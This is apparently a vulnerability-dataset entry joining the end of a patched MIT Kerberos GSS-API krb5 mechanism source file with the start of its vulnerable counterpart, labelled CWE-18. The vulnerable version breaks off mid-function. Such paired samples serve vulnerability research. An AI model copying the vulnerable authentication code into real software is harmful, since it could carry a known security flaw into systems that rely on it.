iakerb_gss_acquire_cred_with_password,
krb5_gss_export_cred,
krb5_gss_import_cred,
NULL, /* import_sec_context_by_mech */
NULL, /* import_name_by_mech */
NULL, /* import_cred_by_mech */
iakerb_gss_get_mic_iov,
iakerb_gss_verify_mic_iov,
iakerb_gss_get_mic_iov_length,
};
#ifdef _GSS_STATIC_LINK
#include "mglueP.h"
static int gss_iakerbmechglue_init(void)
{
struct gss_mech_config mech_iakerb;
memset(&mech_iakerb, 0, sizeof(mech_iakerb));
mech_iakerb.mech = &iakerb_mechanism;
mech_iakerb.mechNameStr = "iakerb";
mech_iakerb.mech_type = (gss_OID)gss_mech_iakerb;
gssint_register_mechinfo(&mech_iakerb);
return 0;
}
static int gss_krb5mechglue_init(void)
{
struct gss_mech_config mech_krb5;
memset(&mech_krb5, 0, sizeof(mech_krb5));
mech_krb5.mech = &krb5_mechanism;
mech_krb5.mechNameStr = "kerberos_v5";
mech_krb5.mech_type = (gss_OID)gss_mech_krb5;
gssint_register_mechinfo(&mech_krb5);
mech_krb5.mechNameStr = "kerberos_v5_old";
mech_krb5.mech_type = (gss_OID)gss_mech_krb5_old;
gssint_register_mechinfo(&mech_krb5);
mech_krb5.mechNameStr = "mskrb";
mech_krb5.mech_type = (gss_OID)gss_mech_krb5_wrong;
gssint_register_mechinfo(&mech_krb5);
return 0;
}
#else
MAKE_INIT_FUNCTION(gss_krb5int_lib_init);
MAKE_FINI_FUNCTION(gss_krb5int_lib_fini);
gss_mechanism KRB5_CALLCONV
gss_mech_initialize(void)
{
return &krb5_mechanism;
}
#endif /* _GSS_STATIC_LINK */
int gss_krb5int_lib_init(void)
{
int err;
#ifdef SHOW_INITFINI_FUNCS
printf("gss_krb5int_lib_init\n");
#endif
add_error_table(&et_k5g_error_table);
#ifndef LEAN_CLIENT
err = k5_mutex_finish_init(&gssint_krb5_keytab_lock);
if (err)
return err;
#endif /* LEAN_CLIENT */
err = k5_key_register(K5_KEY_GSS_KRB5_SET_CCACHE_OLD_NAME, free);
if (err)
return err;
err = k5_key_register(K5_KEY_GSS_KRB5_CCACHE_NAME, free);
if (err)
return err;
err = k5_key_register(K5_KEY_GSS_KRB5_ERROR_MESSAGE,
krb5_gss_delete_error_info);
if (err)
return err;
#ifndef _WIN32
err = k5_mutex_finish_init(&kg_kdc_flag_mutex);
if (err)
return err;
err = k5_mutex_finish_init(&kg_vdb.mutex);
if (err)
return err;
#endif
#ifdef _GSS_STATIC_LINK
err = gss_krb5mechglue_init();
if (err)
return err;
err = gss_iakerbmechglue_init();
if (err)
return err;
#endif
return 0;
}
void gss_krb5int_lib_fini(void)
{
#ifndef _GSS_STATIC_LINK
if (!INITIALIZER_RAN(gss_krb5int_lib_init) || PROGRAM_EXITING()) {
# ifdef SHOW_INITFINI_FUNCS
printf("gss_krb5int_lib_fini: skipping\n");
# endif
return;
}
#endif
#ifdef SHOW_INITFINI_FUNCS
printf("gss_krb5int_lib_fini\n");
#endif
remove_error_table(&et_k5g_error_table);
k5_key_delete(K5_KEY_GSS_KRB5_SET_CCACHE_OLD_NAME);
k5_key_delete(K5_KEY_GSS_KRB5_CCACHE_NAME);
k5_key_delete(K5_KEY_GSS_KRB5_ERROR_MESSAGE);
k5_mutex_destroy(&kg_vdb.mutex);
#ifndef _WIN32
k5_mutex_destroy(&kg_kdc_flag_mutex);
#endif
#ifndef LEAN_CLIENT
k5_mutex_destroy(&gssint_krb5_keytab_lock);
#endif /* LEAN_CLIENT */
}
#ifdef _GSS_STATIC_LINK
extern OM_uint32 gssint_lib_init(void);
#endif
OM_uint32 gss_krb5int_initialize_library (void)
{
#ifdef _GSS_STATIC_LINK
return gssint_mechglue_initialize_library();
#else
return CALL_INIT_FUNCTION(gss_krb5int_lib_init);
#endif
}
| ./CrossVul/dataset_final_sorted/CWE-18/c/good_1535_1 |
crossvul-cpp_data_bad_1535_1 | /* -*- mode: c; c-basic-offset: 4; indent-tabs-mode: nil -*- */
/*
* Copyright 1993 by OpenVision Technologies, Inc.
*
* Permission to use, copy, modify, distribute, and sell this software
* and its documentation for any purpose is hereby granted without fee,
* provided that the above copyright notice appears in all copies and
* that both that copyright notice and this permission notice appear in
* supporting documentation, and that the name of OpenVision not be used
* in advertising or publicity pertaining to distribution of the software
* without specific, written prior permission. OpenVision makes no
* representations about the suitability of this software for any
* purpose. It is provided "as is" without express or implied warranty.
*
* OPENVISION DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
* INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO
* EVENT SHALL OPENVISION BE LIABLE FOR ANY SPECIAL, INDIRECT OR
* CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF
* USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
* OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
* PERFORMANCE OF THIS SOFTWARE.
*/
/*
* Copyright (C) 1998 by the FundsXpress, INC.
*
* All rights reserved.
*
* Export of this software from the United States of America may require
* a specific license from the United States Government. It is the
* responsibility of any person or organization contemplating export to
* obtain such a license before exporting.
*
* WITHIN THAT CONSTRAINT, permission to use, copy, modify, and
* distribute this software and its documentation for any purpose and
* without fee is hereby granted, provided that the above copyright
* notice appear in all copies and that both that copyright notice and
* this permission notice appear in supporting documentation, and that
* the name of FundsXpress. not be used in advertising or publicity pertaining
* to distribution of the software without specific, written prior
* permission. FundsXpress makes no representations about the suitability of
* this software for any purpose. It is provided "as is" without express
* or implied warranty.
*
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
* WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
*/
/*
* Copyright (c) 2006-2008, Novell, Inc.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * The copyright holder's name is not used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
/*
* $Id$
*/
/* For declaration of krb5_ser_context_init */
#include "k5-int.h"
#include "gssapiP_krb5.h"
#include "mglueP.h"
#ifndef NO_PASSWORD
#include <pwd.h>
#endif
/** exported constants defined in gssapi_krb5{,_nx}.h **/
/* these are bogus, but will compile */
/*
* The OID of the draft krb5 mechanism, assigned by IETF, is:
* iso(1) org(3) dod(5) internet(1) security(5)
* kerberosv5(2) = 1.3.5.1.5.2
* The OID of the krb5_name type is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_name(1) = 1.2.840.113554.1.2.2.1
* The OID of the krb5_principal type is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_principal(2) = 1.2.840.113554.1.2.2.2
* The OID of the proposed standard krb5 mechanism is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) = 1.2.840.113554.1.2.2
* The OID of the proposed standard krb5 v2 mechanism is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5v2(3) = 1.2.840.113554.1.2.3
* Provisionally reserved for Kerberos session key algorithm
* identifiers is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_enctype(4) = 1.2.840.113554.1.2.2.4
* Provisionally reserved for Kerberos mechanism-specific APIs:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_gssapi_ext(5) = 1.2.840.113554.1.2.2.5
*/
/*
* Encoding rules: The first two values are encoded in one byte as 40
* * value1 + value2. Subsequent values are encoded base 128, most
* significant digit first, with the high bit (\200) set on all octets
* except the last in each value's encoding.
*/
#define NO_CI_FLAGS_X_OID_LENGTH 6
#define NO_CI_FLAGS_X_OID "\x2a\x85\x70\x2b\x0d\x1d"
const gss_OID_desc krb5_gss_oid_array[] = {
/* this is the official, rfc-specified OID */
{GSS_MECH_KRB5_OID_LENGTH, GSS_MECH_KRB5_OID},
/* this pre-RFC mech OID */
{GSS_MECH_KRB5_OLD_OID_LENGTH, GSS_MECH_KRB5_OLD_OID},
/* this is the unofficial, incorrect mech OID emitted by MS */
{GSS_MECH_KRB5_WRONG_OID_LENGTH, GSS_MECH_KRB5_WRONG_OID},
/* IAKERB OID */
{GSS_MECH_IAKERB_OID_LENGTH, GSS_MECH_IAKERB_OID},
/* this is the v2 assigned OID */
{9, "\052\206\110\206\367\022\001\002\003"},
/* these two are name type OID's */
/* 2.1.1. Kerberos Principal Name Form: (rfc 1964)
* This name form shall be represented by the Object Identifier {iso(1)
* member-body(2) United States(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_name(1)}. The recommended symbolic name for this type
* is "GSS_KRB5_NT_PRINCIPAL_NAME". */
{10, "\052\206\110\206\367\022\001\002\002\001"},
/* gss_nt_krb5_principal. Object identifier for a krb5_principal. Do not use. */
{10, "\052\206\110\206\367\022\001\002\002\002"},
{NO_CI_FLAGS_X_OID_LENGTH, NO_CI_FLAGS_X_OID},
{ 0, 0 }
};
const gss_OID_desc * const gss_mech_krb5 = krb5_gss_oid_array+0;
const gss_OID_desc * const gss_mech_krb5_old = krb5_gss_oid_array+1;
const gss_OID_desc * const gss_mech_krb5_wrong = krb5_gss_oid_array+2;
const gss_OID_desc * const gss_mech_iakerb = krb5_gss_oid_array+3;
const gss_OID_desc * const gss_nt_krb5_name = krb5_gss_oid_array+5;
const gss_OID_desc * const gss_nt_krb5_principal = krb5_gss_oid_array+6;
const gss_OID_desc * const GSS_KRB5_NT_PRINCIPAL_NAME = krb5_gss_oid_array+5;
const gss_OID_desc * const GSS_KRB5_CRED_NO_CI_FLAGS_X = krb5_gss_oid_array+7;
static const gss_OID_set_desc oidsets[] = {
{1, (gss_OID) krb5_gss_oid_array+0}, /* RFC OID */
{1, (gss_OID) krb5_gss_oid_array+1}, /* pre-RFC OID */
{3, (gss_OID) krb5_gss_oid_array+0}, /* all names for krb5 mech */
{4, (gss_OID) krb5_gss_oid_array+0}, /* all krb5 names and IAKERB */
};
const gss_OID_set_desc * const gss_mech_set_krb5 = oidsets+0;
const gss_OID_set_desc * const gss_mech_set_krb5_old = oidsets+1;
const gss_OID_set_desc * const gss_mech_set_krb5_both = oidsets+2;
const gss_OID_set_desc * const kg_all_mechs = oidsets+3;
g_set kg_vdb = G_SET_INIT;
/** default credential support */
/*
* init_sec_context() will explicitly re-acquire default credentials,
* so handling the expiration/invalidation condition here isn't needed.
*/
OM_uint32
kg_get_defcred(minor_status, cred)
OM_uint32 *minor_status;
gss_cred_id_t *cred;
{
OM_uint32 major;
if ((major = krb5_gss_acquire_cred(minor_status,
(gss_name_t) NULL, GSS_C_INDEFINITE,
GSS_C_NULL_OID_SET, GSS_C_INITIATE,
cred, NULL, NULL)) && GSS_ERROR(major)) {
return(major);
}
*minor_status = 0;
return(GSS_S_COMPLETE);
}
OM_uint32
kg_sync_ccache_name (krb5_context context, OM_uint32 *minor_status)
{
OM_uint32 err = 0;
/*
* Sync up the context ccache name with the GSSAPI ccache name.
* If kg_ccache_name is NULL -- normal unless someone has called
* gss_krb5_ccache_name() -- then the system default ccache will
* be picked up and used by resetting the context default ccache.
* This is needed for platforms which support multiple ccaches.
*/
if (!err) {
/* if NULL, resets the context default ccache */
err = krb5_cc_set_default_name(context,
(char *) k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME));
}
*minor_status = err;
return (*minor_status == 0) ? GSS_S_COMPLETE : GSS_S_FAILURE;
}
/* This function returns whether or not the caller set a cccache name. Used by
* gss_acquire_cred to figure out if the caller wants to only look at this
* ccache or search the cache collection for the desired name */
OM_uint32
kg_caller_provided_ccache_name (OM_uint32 *minor_status,
int *out_caller_provided_name)
{
if (out_caller_provided_name) {
*out_caller_provided_name =
(k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME) != NULL);
}
*minor_status = 0;
return GSS_S_COMPLETE;
}
OM_uint32
kg_get_ccache_name (OM_uint32 *minor_status, const char **out_name)
{
const char *name = NULL;
OM_uint32 err = 0;
char *kg_ccache_name;
kg_ccache_name = k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME);
if (kg_ccache_name != NULL) {
name = strdup(kg_ccache_name);
if (name == NULL)
err = ENOMEM;
} else {
krb5_context context = NULL;
/* Reset the context default ccache (see text above), and then
retrieve it. */
err = krb5_gss_init_context(&context);
if (!err)
err = krb5_cc_set_default_name (context, NULL);
if (!err) {
name = krb5_cc_default_name(context);
if (name) {
name = strdup(name);
if (name == NULL)
err = ENOMEM;
}
}
if (err && context)
save_error_info(err, context);
if (context)
krb5_free_context(context);
}
if (!err) {
if (out_name) {
*out_name = name;
}
}
*minor_status = err;
return (*minor_status == 0) ? GSS_S_COMPLETE : GSS_S_FAILURE;
}
OM_uint32
kg_set_ccache_name (OM_uint32 *minor_status, const char *name)
{
char *new_name = NULL;
char *swap = NULL;
char *kg_ccache_name;
krb5_error_code kerr;
if (name) {
new_name = strdup(name);
if (new_name == NULL) {
*minor_status = ENOMEM;
return GSS_S_FAILURE;
}
}
kg_ccache_name = k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME);
swap = kg_ccache_name;
kg_ccache_name = new_name;
new_name = swap;
kerr = k5_setspecific(K5_KEY_GSS_KRB5_CCACHE_NAME, kg_ccache_name);
if (kerr != 0) {
/* Can't store, so free up the storage. */
free(kg_ccache_name);
/* ??? free(new_name); */
*minor_status = kerr;
return GSS_S_FAILURE;
}
free (new_name);
*minor_status = 0;
return GSS_S_COMPLETE;
}
#define g_OID_prefix_equal(o1, o2) \
(((o1)->length >= (o2)->length) && \
(memcmp((o1)->elements, (o2)->elements, (o2)->length) == 0))
/*
* gss_inquire_sec_context_by_oid() methods
*/
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, const gss_ctx_id_t, const gss_OID, gss_buffer_set_t *);
} krb5_gss_inquire_sec_context_by_oid_ops[] = {
{
{GSS_KRB5_GET_TKT_FLAGS_OID_LENGTH, GSS_KRB5_GET_TKT_FLAGS_OID},
gss_krb5int_get_tkt_flags
},
{
{GSS_KRB5_EXTRACT_AUTHZ_DATA_FROM_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_EXTRACT_AUTHZ_DATA_FROM_SEC_CONTEXT_OID},
gss_krb5int_extract_authz_data_from_sec_context
},
{
{GSS_KRB5_INQ_SSPI_SESSION_KEY_OID_LENGTH, GSS_KRB5_INQ_SSPI_SESSION_KEY_OID},
gss_krb5int_inq_session_key
},
{
{GSS_KRB5_EXPORT_LUCID_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_EXPORT_LUCID_SEC_CONTEXT_OID},
gss_krb5int_export_lucid_sec_context
},
{
{GSS_KRB5_EXTRACT_AUTHTIME_FROM_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_EXTRACT_AUTHTIME_FROM_SEC_CONTEXT_OID},
gss_krb5int_extract_authtime_from_sec_context
}
};
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_sec_context_by_oid (OM_uint32 *minor_status,
const gss_ctx_id_t context_handle,
const gss_OID desired_object,
gss_buffer_set_t *data_set)
{
krb5_gss_ctx_id_rec *ctx;
size_t i;
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
if (data_set == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*data_set = GSS_C_NO_BUFFER_SET;
ctx = (krb5_gss_ctx_id_rec *) context_handle;
if (ctx->terminated || !ctx->established)
return GSS_S_NO_CONTEXT;
for (i = 0; i < sizeof(krb5_gss_inquire_sec_context_by_oid_ops)/
sizeof(krb5_gss_inquire_sec_context_by_oid_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gss_inquire_sec_context_by_oid_ops[i].oid)) {
return (*krb5_gss_inquire_sec_context_by_oid_ops[i].func)(minor_status,
context_handle,
desired_object,
data_set);
}
}
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
/*
* gss_inquire_cred_by_oid() methods
*/
#if 0
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, const gss_cred_id_t, const gss_OID, gss_buffer_set_t *);
} krb5_gss_inquire_cred_by_oid_ops[] = {
};
#endif
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_cred_by_oid(OM_uint32 *minor_status,
const gss_cred_id_t cred_handle,
const gss_OID desired_object,
gss_buffer_set_t *data_set)
{
OM_uint32 major_status = GSS_S_FAILURE;
#if 0
size_t i;
#endif
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
if (data_set == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*data_set = GSS_C_NO_BUFFER_SET;
if (cred_handle == GSS_C_NO_CREDENTIAL) {
*minor_status = (OM_uint32)KRB5_NOCREDS_SUPPLIED;
return GSS_S_NO_CRED;
}
major_status = krb5_gss_validate_cred(minor_status, cred_handle);
if (GSS_ERROR(major_status))
return major_status;
#if 0
for (i = 0; i < sizeof(krb5_gss_inquire_cred_by_oid_ops)/
sizeof(krb5_gss_inquire_cred_by_oid_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gss_inquire_cred_by_oid_ops[i].oid)) {
return (*krb5_gss_inquire_cred_by_oid_ops[i].func)(minor_status,
cred_handle,
desired_object,
data_set);
}
}
#endif
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
/*
* gss_set_sec_context_option() methods
* (Disabled until we have something to populate the array.)
*/
#if 0
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, gss_ctx_id_t *, const gss_OID, const gss_buffer_t);
} krb5_gss_set_sec_context_option_ops[] = {
};
#endif
static OM_uint32 KRB5_CALLCONV
krb5_gss_set_sec_context_option (OM_uint32 *minor_status,
gss_ctx_id_t *context_handle,
const gss_OID desired_object,
const gss_buffer_t value)
{
#if 0
size_t i;
#endif
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (context_handle == NULL)
return GSS_S_CALL_INACCESSIBLE_READ;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
#if 0
for (i = 0; i < sizeof(krb5_gss_set_sec_context_option_ops)/
sizeof(krb5_gss_set_sec_context_option_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gss_set_sec_context_option_ops[i].oid)) {
return (*krb5_gss_set_sec_context_option_ops[i].func)(minor_status,
context_handle,
desired_object,
value);
}
}
#endif
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
static OM_uint32
no_ci_flags(OM_uint32 *minor_status,
gss_cred_id_t *cred_handle,
const gss_OID desired_oid,
const gss_buffer_t value)
{
krb5_gss_cred_id_t cred;
cred = (krb5_gss_cred_id_t) *cred_handle;
cred->suppress_ci_flags = 1;
*minor_status = 0;
return GSS_S_COMPLETE;
}
/*
* gssspi_set_cred_option() methods
*/
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, gss_cred_id_t *, const gss_OID, const gss_buffer_t);
} krb5_gssspi_set_cred_option_ops[] = {
{
{GSS_KRB5_COPY_CCACHE_OID_LENGTH, GSS_KRB5_COPY_CCACHE_OID},
gss_krb5int_copy_ccache
},
{
{GSS_KRB5_SET_ALLOWABLE_ENCTYPES_OID_LENGTH, GSS_KRB5_SET_ALLOWABLE_ENCTYPES_OID},
gss_krb5int_set_allowable_enctypes
},
{
{GSS_KRB5_SET_CRED_RCACHE_OID_LENGTH, GSS_KRB5_SET_CRED_RCACHE_OID},
gss_krb5int_set_cred_rcache
},
{
{GSS_KRB5_IMPORT_CRED_OID_LENGTH, GSS_KRB5_IMPORT_CRED_OID},
gss_krb5int_import_cred
},
{
{NO_CI_FLAGS_X_OID_LENGTH, NO_CI_FLAGS_X_OID},
no_ci_flags
},
};
static OM_uint32 KRB5_CALLCONV
krb5_gssspi_set_cred_option(OM_uint32 *minor_status,
gss_cred_id_t *cred_handle,
const gss_OID desired_object,
const gss_buffer_t value)
{
OM_uint32 major_status = GSS_S_FAILURE;
size_t i;
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
if (cred_handle == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
if (*cred_handle != GSS_C_NO_CREDENTIAL) {
major_status = krb5_gss_validate_cred(minor_status, *cred_handle);
if (GSS_ERROR(major_status))
return major_status;
}
for (i = 0; i < sizeof(krb5_gssspi_set_cred_option_ops)/
sizeof(krb5_gssspi_set_cred_option_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gssspi_set_cred_option_ops[i].oid)) {
return (*krb5_gssspi_set_cred_option_ops[i].func)(minor_status,
cred_handle,
desired_object,
value);
}
}
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
/*
* gssspi_mech_invoke() methods
*/
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, const gss_OID, const gss_OID, gss_buffer_t);
} krb5_gssspi_mech_invoke_ops[] = {
{
{GSS_KRB5_REGISTER_ACCEPTOR_IDENTITY_OID_LENGTH, GSS_KRB5_REGISTER_ACCEPTOR_IDENTITY_OID},
gss_krb5int_register_acceptor_identity
},
{
{GSS_KRB5_CCACHE_NAME_OID_LENGTH, GSS_KRB5_CCACHE_NAME_OID},
gss_krb5int_ccache_name
},
{
{GSS_KRB5_FREE_LUCID_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_FREE_LUCID_SEC_CONTEXT_OID},
gss_krb5int_free_lucid_sec_context
},
#ifndef _WIN32
{
{GSS_KRB5_USE_KDC_CONTEXT_OID_LENGTH, GSS_KRB5_USE_KDC_CONTEXT_OID},
krb5int_gss_use_kdc_context
},
#endif
};
static OM_uint32 KRB5_CALLCONV
krb5_gssspi_mech_invoke (OM_uint32 *minor_status,
const gss_OID desired_mech,
const gss_OID desired_object,
gss_buffer_t value)
{
size_t i;
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_mech == GSS_C_NO_OID)
return GSS_S_BAD_MECH;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
for (i = 0; i < sizeof(krb5_gssspi_mech_invoke_ops)/
sizeof(krb5_gssspi_mech_invoke_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gssspi_mech_invoke_ops[i].oid)) {
return (*krb5_gssspi_mech_invoke_ops[i].func)(minor_status,
desired_mech,
desired_object,
value);
}
}
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
#define GS2_KRB5_SASL_NAME "GS2-KRB5"
#define GS2_KRB5_SASL_NAME_LEN (sizeof(GS2_KRB5_SASL_NAME) - 1)
#define GS2_IAKERB_SASL_NAME "GS2-IAKERB"
#define GS2_IAKERB_SASL_NAME_LEN (sizeof(GS2_IAKERB_SASL_NAME) - 1)
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_mech_for_saslname(OM_uint32 *minor_status,
const gss_buffer_t sasl_mech_name,
gss_OID *mech_type)
{
*minor_status = 0;
if (sasl_mech_name->length == GS2_KRB5_SASL_NAME_LEN &&
memcmp(sasl_mech_name->value,
GS2_KRB5_SASL_NAME, GS2_KRB5_SASL_NAME_LEN) == 0) {
if (mech_type != NULL)
*mech_type = (gss_OID)gss_mech_krb5;
return GSS_S_COMPLETE;
} else if (sasl_mech_name->length == GS2_IAKERB_SASL_NAME_LEN &&
memcmp(sasl_mech_name->value,
GS2_IAKERB_SASL_NAME, GS2_IAKERB_SASL_NAME_LEN) == 0) {
if (mech_type != NULL)
*mech_type = (gss_OID)gss_mech_iakerb;
return GSS_S_COMPLETE;
}
return GSS_S_BAD_MECH;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_saslname_for_mech(OM_uint32 *minor_status,
const gss_OID desired_mech,
gss_buffer_t sasl_mech_name,
gss_buffer_t mech_name,
gss_buffer_t mech_description)
{
if (g_OID_equal(desired_mech, gss_mech_iakerb)) {
if (!g_make_string_buffer(GS2_IAKERB_SASL_NAME, sasl_mech_name) ||
!g_make_string_buffer("iakerb", mech_name) ||
!g_make_string_buffer("Initial and Pass Through Authentication "
"Kerberos Mechanism (IAKERB)",
mech_description))
goto fail;
} else {
if (!g_make_string_buffer(GS2_KRB5_SASL_NAME, sasl_mech_name) ||
!g_make_string_buffer("krb5", mech_name) ||
!g_make_string_buffer("Kerberos 5 GSS-API Mechanism",
mech_description))
goto fail;
}
*minor_status = 0;
return GSS_S_COMPLETE;
fail:
*minor_status = ENOMEM;
return GSS_S_FAILURE;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_attrs_for_mech(OM_uint32 *minor_status,
gss_const_OID mech,
gss_OID_set *mech_attrs,
gss_OID_set *known_mech_attrs)
{
OM_uint32 major, tmpMinor;
if (mech_attrs == NULL) {
*minor_status = 0;
return GSS_S_COMPLETE;
}
major = gss_create_empty_oid_set(minor_status, mech_attrs);
if (GSS_ERROR(major))
goto cleanup;
#define MA_SUPPORTED(ma) do { \
major = gss_add_oid_set_member(minor_status, (gss_OID)ma, \
mech_attrs); \
if (GSS_ERROR(major)) \
goto cleanup; \
} while (0)
MA_SUPPORTED(GSS_C_MA_MECH_CONCRETE);
MA_SUPPORTED(GSS_C_MA_ITOK_FRAMED);
MA_SUPPORTED(GSS_C_MA_AUTH_INIT);
MA_SUPPORTED(GSS_C_MA_AUTH_TARG);
MA_SUPPORTED(GSS_C_MA_DELEG_CRED);
MA_SUPPORTED(GSS_C_MA_INTEG_PROT);
MA_SUPPORTED(GSS_C_MA_CONF_PROT);
MA_SUPPORTED(GSS_C_MA_MIC);
MA_SUPPORTED(GSS_C_MA_WRAP);
MA_SUPPORTED(GSS_C_MA_PROT_READY);
MA_SUPPORTED(GSS_C_MA_REPLAY_DET);
MA_SUPPORTED(GSS_C_MA_OOS_DET);
MA_SUPPORTED(GSS_C_MA_CBINDINGS);
MA_SUPPORTED(GSS_C_MA_CTX_TRANS);
if (g_OID_equal(mech, gss_mech_iakerb)) {
MA_SUPPORTED(GSS_C_MA_AUTH_INIT_INIT);
MA_SUPPORTED(GSS_C_MA_NOT_DFLT_MECH);
} else if (!g_OID_equal(mech, gss_mech_krb5)) {
MA_SUPPORTED(GSS_C_MA_DEPRECATED);
}
cleanup:
if (GSS_ERROR(major))
gss_release_oid_set(&tmpMinor, mech_attrs);
return major;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_localname(OM_uint32 *minor,
const gss_name_t pname,
const gss_const_OID mech_type,
gss_buffer_t localname)
{
krb5_context context;
krb5_error_code code;
krb5_gss_name_t kname;
char lname[BUFSIZ];
code = krb5_gss_init_context(&context);
if (code != 0) {
*minor = code;
return GSS_S_FAILURE;
}
kname = (krb5_gss_name_t)pname;
code = krb5_aname_to_localname(context, kname->princ,
sizeof(lname), lname);
if (code != 0) {
*minor = KRB5_NO_LOCALNAME;
krb5_free_context(context);
return GSS_S_FAILURE;
}
krb5_free_context(context);
localname->value = gssalloc_strdup(lname);
localname->length = strlen(lname);
return (code == 0) ? GSS_S_COMPLETE : GSS_S_FAILURE;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_authorize_localname(OM_uint32 *minor,
const gss_name_t pname,
gss_const_buffer_t local_user,
gss_const_OID name_type)
{
krb5_context context;
krb5_error_code code;
krb5_gss_name_t kname;
char *user;
int user_ok;
if (name_type != GSS_C_NO_OID &&
!g_OID_equal(name_type, GSS_C_NT_USER_NAME)) {
return GSS_S_BAD_NAMETYPE;
}
kname = (krb5_gss_name_t)pname;
code = krb5_gss_init_context(&context);
if (code != 0) {
*minor = code;
return GSS_S_FAILURE;
}
user = k5memdup0(local_user->value, local_user->length, &code);
if (user == NULL) {
*minor = code;
krb5_free_context(context);
return GSS_S_FAILURE;
}
user_ok = krb5_kuserok(context, kname->princ, user);
free(user);
krb5_free_context(context);
*minor = 0;
